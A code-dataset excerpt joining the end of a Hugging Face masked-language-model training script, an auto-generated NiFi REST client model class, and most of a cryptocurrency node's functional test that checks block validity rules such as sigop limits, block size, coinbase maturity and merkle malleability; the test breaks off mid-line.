eval_dataset.select(range(data_args.max_eval_samples)) # Data collator # This one will take care of randomly masking the tokens. pad_to_multiple_of_8 = data_args.line_by_line and training_args.fp16 and not data_args.pad_to_max_length data_collator = DataCollatorForLanguageModeling( tokenizer=tokenizer, mlm_probability=data_args.mlm_probability, pad_to_multiple_of=8 if pad_to_multiple_of_8 else None, ) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, data_collator=data_collator, ) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "fill-mask"} if data_args.dataset_name is not None: kwargs["dataset_tags"] = data_args.dataset_name if data_args.dataset_config_name is not None: kwargs["dataset_args"] = data_args.dataset_config_name kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}" else: kwargs["dataset"] = data_args.dataset_name if training_args.push_to_hub: trainer.push_to_hub(**kwargs) else: trainer.create_model_card(**kwargs) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main()
43.562162
119
0.667783
d0347cc0f904769260deaaf47c29c9bd6df1f67c
3,541
py
Python
nipyapi/nifi/models/drop_request_entity.py
iMajna/nipyapi
5480af8fe8c6b470249837835cb1a067abb6678e
[ "Apache-2.0" ]
null
null
null
nipyapi/nifi/models/drop_request_entity.py
iMajna/nipyapi
5480af8fe8c6b470249837835cb1a067abb6678e
[ "Apache-2.0" ]
1
2020-03-16T10:02:46.000Z
2020-03-16T13:37:42.000Z
nipyapi/nifi/models/drop_request_entity.py
iMajna/nipyapi
5480af8fe8c6b470249837835cb1a067abb6678e
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 """ NiFi Rest Api The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service. OpenAPI spec version: 1.12.1 Contact: dev@nifi.apache.org Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class DropRequestEntity(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'drop_request': 'DropRequestDTO' } attribute_map = { 'drop_request': 'dropRequest' } def __init__(self, drop_request=None): """ DropRequestEntity - a model defined in Swagger """ self._drop_request = None if drop_request is not None: self.drop_request = drop_request @property def drop_request(self): """ Gets the drop_request of this DropRequestEntity. :return: The drop_request of this DropRequestEntity. :rtype: DropRequestDTO """ return self._drop_request @drop_request.setter def drop_request(self, drop_request): """ Sets the drop_request of this DropRequestEntity. :param drop_request: The drop_request of this DropRequestEntity. :type: DropRequestDTO """ self._drop_request = drop_request def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, DropRequestEntity): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
28.556452
479
0.556622
0e7c9f3574619d899ba3d12f44f8c3a9ea0c8558
64,044
py
Python
test/functional/feature_block.py
LOUD-Mining/WhatCoin
867630c222dfc7643fe13c1ec69ae187210f157d
[ "MIT" ]
null
null
null
test/functional/feature_block.py
LOUD-Mining/WhatCoin
867630c222dfc7643fe13c1ec69ae187210f157d
[ "MIT" ]
null
null
null
test/functional/feature_block.py
LOUD-Mining/WhatCoin
867630c222dfc7643fe13c1ec69ae187210f157d
[ "MIT" ]
1
2021-04-22T05:44:57.000Z
2021-04-22T05:44:57.000Z
#!/usr/bin/env python3 # Copyright (c) 2015-2019 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test block processing.""" import copy import struct import time from test_framework.blocktools import ( create_block, create_coinbase, create_tx_with_script, get_legacy_sigopcount_block, MAX_BLOCK_SIGOPS, ) from test_framework.key import ECKey from test_framework.messages import ( CBlock, COIN, COutPoint, CTransaction, CTxIn, CTxOut, MAX_BLOCK_BASE_SIZE, uint256_from_compact, uint256_from_str, ) from test_framework.mininode import P2PDataStore from test_framework.script import ( CScript, MAX_SCRIPT_ELEMENT_SIZE, OP_2DUP, OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY, OP_CHECKSIG, OP_CHECKSIGVERIFY, OP_ELSE, OP_ENDIF, OP_EQUAL, OP_DROP, OP_FALSE, OP_HASH160, OP_IF, OP_INVALIDOPCODE, OP_RETURN, OP_TRUE, SIGHASH_ALL, SignatureHash, hash160, ) from test_framework.test_framework import BitcoinTestFramework from test_framework.util import assert_equal from data import invalid_txs from test_framework.runebaseconfig import * # Use this class for tests that require behavior other than normal "mininode" behavior. # For now, it is used to serialize a bloated varint (b64). class CBrokenBlock(CBlock): def initialize(self, base_block): self.vtx = copy.deepcopy(base_block.vtx) self.hashMerkleRoot = self.calc_merkle_root() def serialize(self, with_witness=False): r = b"" r += super(CBlock, self).serialize() r += struct.pack("<BQ", 255, len(self.vtx)) for tx in self.vtx: if with_witness: r += tx.serialize_with_witness() else: r += tx.serialize_without_witness() return r def normal_serialize(self): return super().serialize() class FullBlockTest(BitcoinTestFramework): def set_test_params(self): self.num_nodes = 1 self.setup_clean_chain = True self.extra_args = [[]] def run_test(self): node = self.nodes[0] # convenience reference to the node self.bootstrap_p2p() # Add one p2p connection to the node self.block_heights = {} self.coinbase_key = ECKey() self.coinbase_key.generate() self.coinbase_pubkey = self.coinbase_key.get_pubkey().get_bytes() self.tip = None self.blocks = {} self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16) self.block_heights[self.genesis_hash] = 0 self.spendable_outputs = [] # Create a new block b0 = self.next_block(0) self.save_spendable_output() self.sync_blocks([b0]) # These constants chosen specifically to trigger an immature coinbase spend # at a certain time below. NUM_BUFFER_BLOCKS_TO_GENERATE = 98-15+COINBASE_MATURITY NUM_OUTPUTS_TO_COLLECT = 99 # Allow the block to mature blocks = [] # Now we need that block to mature so we can spend the coinbase. for i in range(NUM_BUFFER_BLOCKS_TO_GENERATE): blocks.append(self.next_block("maturitybuffer.{}".format(i))) self.save_spendable_output() self.sync_blocks(blocks) # collect spendable outputs now to avoid cluttering the code later on out = [] for i in range(NUM_OUTPUTS_TO_COLLECT): out.append(self.get_spendable_output()) # Start by building a couple of blocks on top (which output is spent is # in parentheses): # genesis -> b1 (0) -> b2 (1) b1 = self.next_block(1, spend=out[0]) self.save_spendable_output() b2 = self.next_block(2, spend=out[1]) self.save_spendable_output() self.sync_blocks([b1, b2], timeout=4) # Select a txn with an output eligible for spending. This won't actually be spent, # since we're testing submission of a series of blocks with invalid txns. attempt_spend_tx = out[2] # Submit blocks for rejection, each of which contains a single transaction # (aside from coinbase) which should be considered invalid. for TxTemplate in invalid_txs.iter_all_templates(): template = TxTemplate(spend_tx=attempt_spend_tx) if template.valid_in_block: continue self.log.info("Reject block with invalid tx: %s", TxTemplate.__name__) blockname = "for_invalid.%s" % TxTemplate.__name__ badblock = self.next_block(blockname) badtx = template.get_tx() if TxTemplate != invalid_txs.InputMissing: self.sign_tx(badtx, attempt_spend_tx) badtx.rehash() badblock = self.update_block(blockname, [badtx]) self.sync_blocks( [badblock], success=False, reject_reason=(template.block_reject_reason or template.reject_reason), reconnect=True, timeout=2) self.move_tip(2) # Fork like this: # # genesis -> b1 (0) -> b2 (1) # \-> b3 (1) # # Nothing should happen at this point. We saw b2 first so it takes priority. self.log.info("Don't reorg to a chain of the same length") self.move_tip(1) b3 = self.next_block(3, spend=out[1]) txout_b3 = b3.vtx[1] self.sync_blocks([b3], False) # Now we add another block to make the alternative chain longer. # # genesis -> b1 (0) -> b2 (1) # \-> b3 (1) -> b4 (2) self.log.info("Reorg to a longer chain") b4 = self.next_block(4, spend=out[2]) self.sync_blocks([b4]) # ... and back to the first chain. # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b3 (1) -> b4 (2) self.move_tip(2) b5 = self.next_block(5, spend=out[2]) self.save_spendable_output() self.sync_blocks([b5], False) self.log.info("Reorg back to the original chain") b6 = self.next_block(6, spend=out[3]) self.sync_blocks([b6], True) # Try to create a fork that double-spends # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b7 (2) -> b8 (4) # \-> b3 (1) -> b4 (2) self.log.info("Reject a chain with a double spend, even if it is longer") self.move_tip(5) b7 = self.next_block(7, spend=out[2]) self.sync_blocks([b7], False) b8 = self.next_block(8, spend=out[4]) self.sync_blocks([b8], False, reconnect=True) # Try to create a block that has too much fee # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b9 (4) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block where the miner creates too much coinbase reward") self.move_tip(6) b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1) self.sync_blocks([b9], success=False, reconnect=True) # Create a fork that ends in a block with too much fee (the one that causes the reorg) # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b10 (3) -> b11 (4) # \-> b3 (1) -> b4 (2) self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer") self.move_tip(5) b10 = self.next_block(10, spend=out[3]) self.sync_blocks([b10], False) b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1) self.sync_blocks([b11], success=False, reconnect=True) # Try again, but with a valid fork first # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b14 (5) # \-> b3 (1) -> b4 (2) self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)") self.move_tip(5) b12 = self.next_block(12, spend=out[3]) self.save_spendable_output() b13 = self.next_block(13, spend=out[4]) self.save_spendable_output() b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1) self.sync_blocks([b12, b13, b14], success=False, reconnect=True) # New tip should be b13. assert_equal(node.getbestblockhash(), b13.hash) # Add a block with MAX_BLOCK_SIGOPS and one with one more sigop # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6) # \-> b3 (1) -> b4 (2) self.log.info("Accept a block with lots of checksigs") lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1)) self.move_tip(13) b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs) self.save_spendable_output() self.sync_blocks([b15], True) self.log.info("Reject a block with too many checksigs") too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS)) b16 = self.next_block(16, spend=out[6], script=too_many_checksigs) self.sync_blocks([b16], success=False, reject_reason='bad-blk-sigops', reconnect=True) # Attempt to spend a transaction created on a different fork # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1]) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block with a spend from a re-org'ed out tx") self.move_tip(15) b17 = self.next_block(17, spend=txout_b3) self.sync_blocks([b17], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # Attempt to spend a transaction created on a different fork (on a fork this time) # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) # \-> b18 (b3.vtx[1]) -> b19 (6) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)") self.move_tip(13) b18 = self.next_block(18, spend=txout_b3) self.sync_blocks([b18], False) b19 = self.next_block(19, spend=out[6]) self.sync_blocks([b19], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # Attempt to spend a coinbase at depth too low # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block spending an immature coinbase.") self.move_tip(15) b20 = self.next_block(20, spend=out[98]) self.sync_blocks([b20], success=False, reject_reason='bad-txns-premature-spend-of-coinbase') # Attempt to spend a coinbase at depth too low (on a fork this time) # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) # \-> b21 (6) -> b22 (5) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block spending an immature coinbase (on a forked chain)") self.move_tip(13) b21 = self.next_block(21, spend=out[6]) self.sync_blocks([b21], False) b22 = self.next_block(22, spend=out[96]) self.sync_blocks([b22], success=False, reject_reason='bad-txns-premature-spend-of-coinbase') # Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) # \-> b24 (6) -> b25 (7) # \-> b3 (1) -> b4 (2) self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE") self.move_tip(15) b23 = self.next_block(23, spend=out[6]) tx = CTransaction() script_length = 1000000 - len(b23.serialize()) - 69 script_output = CScript([b'\x00' * script_length]) tx.vout.append(CTxOut(0, script_output)) tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0))) b23 = self.update_block(23, [tx]) # Make sure the math above worked out to produce a max-sized block assert_equal(len(b23.serialize()), 1000000) self.sync_blocks([b23], True) self.save_spendable_output() self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1") self.move_tip(15) b24 = self.next_block(24, spend=out[6]) script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69 script_output = CScript([b'\x00' * (script_length + 1)]) tx.vout = [CTxOut(0, script_output)] b24 = self.update_block(24, [tx]) assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1) self.sync_blocks([b24], success=False, reconnect=True) b25 = self.next_block(25, spend=out[7]) self.sync_blocks([b25], False) # Create blocks with a coinbase input script size out of range # genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3) # \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) # \-> ... (6) -> ... (7) # \-> b3 (1) -> b4 (2) self.log.info("Reject a block with coinbase input script size out of range") self.move_tip(15) b26 = self.next_block(26, spend=out[6]) b26.vtx[0].vin[0].scriptSig = b'\x00' b26.vtx[0].rehash() # update_block causes the merkle root to get updated, even with no new # transactions, and updates the required state. b26 = self.update_block(26, []) self.sync_blocks([b26], success=False, reject_reason='bad-cb-length', reconnect=True) # Extend the b26 chain to make sure bitcoind isn't accepting b26 b27 = self.next_block(27, spend=out[7]) self.sync_blocks([b27], False) # Now try a too-large-coinbase script self.move_tip(15) b28 = self.next_block(28, spend=out[6]) b28.vtx[0].vin[0].scriptSig = b'\x00' * 101 b28.vtx[0].rehash() b28 = self.update_block(28, []) self.sync_blocks([b28], success=False, reject_reason='bad-cb-length', reconnect=True) # Extend the b28 chain to make sure bitcoind isn't accepting b28 b29 = self.next_block(29, spend=out[7]) self.sync_blocks([b29], False) # b30 has a max-sized coinbase scriptSig. self.move_tip(23) b30 = self.next_block(30) b30.vtx[0].vin[0].scriptSig += b'\x00' * 90 b30.vtx[0].rehash() b30 = self.update_block(30, []) self.sync_blocks([b30], True) self.save_spendable_output() # b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY # # genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) # \-> b36 (11) # \-> b34 (10) # \-> b32 (9) # # MULTISIG: each op code counts as 20 sigops. To create the edge case, pack another 19 sigops at the end. self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops") lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19) b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs) assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS) self.sync_blocks([b31], True) self.save_spendable_output() # this goes over the limit because the coinbase has one sigop self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops") too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20)) b32 = self.next_block(32, spend=out[9], script=too_many_multisigs) assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1) self.sync_blocks([b32], success=False, reject_reason='bad-blk-sigops', reconnect=True) # CHECKMULTISIGVERIFY self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops") self.move_tip(31) lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19) b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs) self.sync_blocks([b33], True) self.save_spendable_output() self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops") too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20)) b34 = self.next_block(34, spend=out[10], script=too_many_multisigs) self.sync_blocks([b34], success=False, reject_reason='bad-blk-sigops', reconnect=True) # CHECKSIGVERIFY self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops") self.move_tip(33) lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1)) b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs) self.sync_blocks([b35], True) self.save_spendable_output() self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops") too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS)) b36 = self.next_block(36, spend=out[11], script=too_many_checksigs) self.sync_blocks([b36], success=False, reject_reason='bad-blk-sigops', reconnect=True) # Check spending of a transaction in a block which failed to connect # # b6 (3) # b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) # \-> b37 (11) # \-> b38 (11/37) # # save 37's spendable output, but then double-spend out11 to invalidate the block self.log.info("Reject a block spending transaction from a block which failed to connect") self.move_tip(35) b37 = self.next_block(37, spend=out[11]) txout_b37 = b37.vtx[1] tx = self.create_and_sign_transaction(out[11], 0) b37 = self.update_block(37, [tx]) self.sync_blocks([b37], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid self.move_tip(35) b38 = self.next_block(38, spend=txout_b37) self.sync_blocks([b38], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True) # Check P2SH SigOp counting # # # 13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12) # \-> b40 (12) # # b39 - create some P2SH outputs that will require 6 sigops to spend: # # redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG # p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL # self.log.info("Check P2SH SIGOPS are correctly counted") self.move_tip(35) b39 = self.next_block(39) b39_outputs = 0 b39_sigops_per_output = 6 # Build the redeem script, hash it, use hash to create the p2sh script redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG]) redeem_script_hash = hash160(redeem_script) p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL]) # Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE # This must be signed because it is spending a coinbase spend = out[11] tx = self.create_tx(spend, 0, 1, p2sh_script) tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE]))) self.sign_tx(tx, spend) tx.rehash() b39 = self.update_block(39, [tx]) b39_outputs += 1 # Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE tx_new = None tx_last = tx total_size = len(b39.serialize()) while(total_size < MAX_BLOCK_BASE_SIZE): tx_new = self.create_tx(tx_last, 1, 1, p2sh_script) tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE]))) tx_new.rehash() total_size += len(tx_new.serialize()) if total_size >= MAX_BLOCK_BASE_SIZE: break b39.vtx.append(tx_new) # add tx to block tx_last = tx_new b39_outputs += 1 b39 = self.update_block(39, []) self.sync_blocks([b39], True) self.save_spendable_output() # Test sigops in P2SH redeem scripts # # b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops. # The first tx has one sigop and then at the end we add 2 more to put us just over the max. # # b41 does the same, less one, so it has the maximum sigops permitted. # self.log.info("Reject a block with too many P2SH sigops") self.move_tip(39) b40 = self.next_block(40, spend=out[12]) sigops = get_legacy_sigopcount_block(b40) numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output assert_equal(numTxes <= b39_outputs, True) lastOutpoint = COutPoint(b40.vtx[1].sha256, 0) new_txs = [] for i in range(1, numTxes + 1): tx = CTransaction() tx.vout.append(CTxOut(1, CScript([OP_TRUE]))) tx.vin.append(CTxIn(lastOutpoint, b'')) # second input is corresponding P2SH output from b39 tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b'')) # Note: must pass the redeem_script (not p2sh_script) to the signature hash function (sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL) sig = self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL])) scriptSig = CScript([sig, redeem_script]) tx.vin[1].scriptSig = scriptSig tx.rehash() new_txs.append(tx) lastOutpoint = COutPoint(tx.sha256, 0) b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1 tx = CTransaction() tx.vin.append(CTxIn(lastOutpoint, b'')) tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill))) tx.rehash() new_txs.append(tx) self.update_block(40, new_txs) self.sync_blocks([b40], success=False, reject_reason='bad-blk-sigops', reconnect=True) # same as b40, but one less sigop self.log.info("Accept a block with the max number of P2SH sigops") self.move_tip(39) b41 = self.next_block(41, spend=None) self.update_block(41, b40.vtx[1:-1]) b41_sigops_to_fill = b40_sigops_to_fill - 1 tx = CTransaction() tx.vin.append(CTxIn(lastOutpoint, b'')) tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill))) tx.rehash() self.update_block(41, [tx]) self.sync_blocks([b41], True) # Fork off of b39 to create a constant base again # # b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) # \-> b41 (12) # self.move_tip(39) b42 = self.next_block(42, spend=out[12]) self.save_spendable_output() b43 = self.next_block(43, spend=out[13]) self.save_spendable_output() self.sync_blocks([b42, b43], True) # Test a number of really invalid scenarios # # -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14) # \-> ??? (15) # The next few blocks are going to be created "by hand" since they'll do funky things, such as having # the first transaction be non-coinbase, etc. The purpose of b44 is to make sure this works. self.log.info("Build block 44 manually") height = self.block_heights[self.tip.sha256] + 1 coinbase = create_coinbase(height, self.coinbase_pubkey) b44 = CBlock() b44.nTime = self.tip.nTime + 1 b44.hashPrevBlock = self.tip.sha256 b44.nBits = 0x207fffff b44.vtx.append(coinbase) b44.hashMerkleRoot = b44.calc_merkle_root() b44.solve() self.tip = b44 self.block_heights[b44.sha256] = height self.blocks[44] = b44 self.sync_blocks([b44], True) self.log.info("Reject a block with a non-coinbase as the first tx") non_coinbase = self.create_tx(out[15], 0, 1) b45 = CBlock() b45.nTime = self.tip.nTime + 1 b45.hashPrevBlock = self.tip.sha256 b45.nBits = 0x207fffff b45.vtx.append(non_coinbase) b45.hashMerkleRoot = b45.calc_merkle_root() b45.calc_sha256() b45.solve() self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1 self.tip = b45 self.blocks[45] = b45 self.sync_blocks([b45], success=False, reject_reason='bad-cb-missing', reconnect=True) self.log.info("Reject a block with no transactions") self.move_tip(44) b46 = CBlock() b46.nTime = b44.nTime + 1 b46.hashPrevBlock = b44.sha256 b46.nBits = 0x207fffff b46.vtx = [] b46.hashMerkleRoot = 0 b46.solve() self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1 self.tip = b46 assert 46 not in self.blocks self.blocks[46] = b46 self.sync_blocks([b46], success=False, reject_reason='bad-cb-missing', reconnect=True) self.log.info("Reject a block with invalid work") self.move_tip(44) b47 = self.next_block(47, solve=False) target = uint256_from_compact(b47.nBits) while b47.sha256 < target: b47.nNonce += 1 b47.rehash() self.sync_blocks([b47], False, force_send=True, reject_reason='high-hash') self.log.info("Reject a block with a timestamp >2 hours in the future") self.move_tip(44) b48 = self.next_block(48, solve=False) b48.nBits -= 1 b48.solve() self.sync_blocks([b48], False, force_send=True, reconnect=True) self.log.info("Reject a block with invalid merkle hash") self.move_tip(44) b49 = self.next_block(49) b49.hashMerkleRoot += 1 b49.solve() self.sync_blocks([b49], success=False, reject_reason='bad-txnmrklroot', reconnect=True) self.log.info("Reject a block with incorrect POW limit") self.move_tip(44) b50 = self.next_block(50) b50.nBits = b50.nBits - 1 b50.solve() self.sync_blocks([b50], False, force_send=True, reject_reason='bad-diffbits', reconnect=True) self.log.info("Reject a block with two coinbase transactions") self.move_tip(44) b51 = self.next_block(51) cb2 = create_coinbase(51, self.coinbase_pubkey) b51 = self.update_block(51, [cb2]) self.sync_blocks([b51], success=False, reject_reason='bad-cb-multiple', reconnect=True) self.log.info("Reject a block with duplicate transactions") # Note: txns have to be in the right position in the merkle tree to trigger this error self.move_tip(44) b52 = self.next_block(52, spend=out[15]) tx = self.create_tx(b52.vtx[1], 0, 1) b52 = self.update_block(52, [tx, tx]) self.sync_blocks([b52], success=False, reject_reason='bad-txns-duplicate', reconnect=True) # Test block timestamps # -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) # \-> b54 (15) # self.move_tip(43) b53 = self.next_block(53, spend=out[14]) self.sync_blocks([b53], False, force_send=False) self.save_spendable_output() self.log.info("Reject a block with timestamp before MedianTimePast") b54 = self.next_block(54, spend=out[15]) b54.nBits -= 1 b54.solve() self.sync_blocks([b54], False, force_send=True, reconnect=True) # valid timestamp self.move_tip(53) b55 = self.next_block(55, spend=out[15]) b55.nTime = b35.nTime self.update_block(55, []) self.sync_blocks([b55], True, force_send=True) self.save_spendable_output() # Test Merkle tree malleability # # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16) # \-> b57 (16) # \-> b56p2 (16) # \-> b56 (16) # # Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without # affecting the merkle root of a block, while still invalidating it. # See: src/consensus/merkle.h # # b57 has three txns: coinbase, tx, tx1. The merkle root computation will duplicate tx. # Result: OK # # b56 copies b57 but duplicates tx1 and does not recalculate the block hash. So it has a valid merkle # root but duplicate transactions. # Result: Fails # # b57p2 has six transactions in its merkle tree: # - coinbase, tx, tx1, tx2, tx3, tx4 # Merkle root calculation will duplicate as necessary. # Result: OK. # # b56p2 copies b57p2 but adds both tx3 and tx4. The purpose of the test is to make sure the code catches # duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates # that the error was caught early, avoiding a DOS vulnerability.) # b57 - a good block with 2 txs, don't submit until end self.move_tip(55) b57 = self.next_block(57) tx = self.create_and_sign_transaction(out[16], 1) tx1 = self.create_tx(tx, 0, 1) b57 = self.update_block(57, [tx, tx1]) # b56 - copy b57, add a duplicate tx self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)") self.move_tip(55) b56 = copy.deepcopy(b57) self.blocks[56] = b56 assert_equal(len(b56.vtx), 3) b56 = self.update_block(56, [tx1]) assert_equal(b56.hash, b57.hash) self.sync_blocks([b56], success=False, reject_reason='bad-txns-duplicate', reconnect=True) # b57p2 - a good block with 6 tx'es, don't submit until end self.move_tip(55) b57p2 = self.next_block("57p2") tx = self.create_and_sign_transaction(out[16], 1) tx1 = self.create_tx(tx, 0, 1) tx2 = self.create_tx(tx1, 0, 1) tx3 = self.create_tx(tx2, 0, 1) tx4 = self.create_tx(tx3, 0, 1) b57p2 = 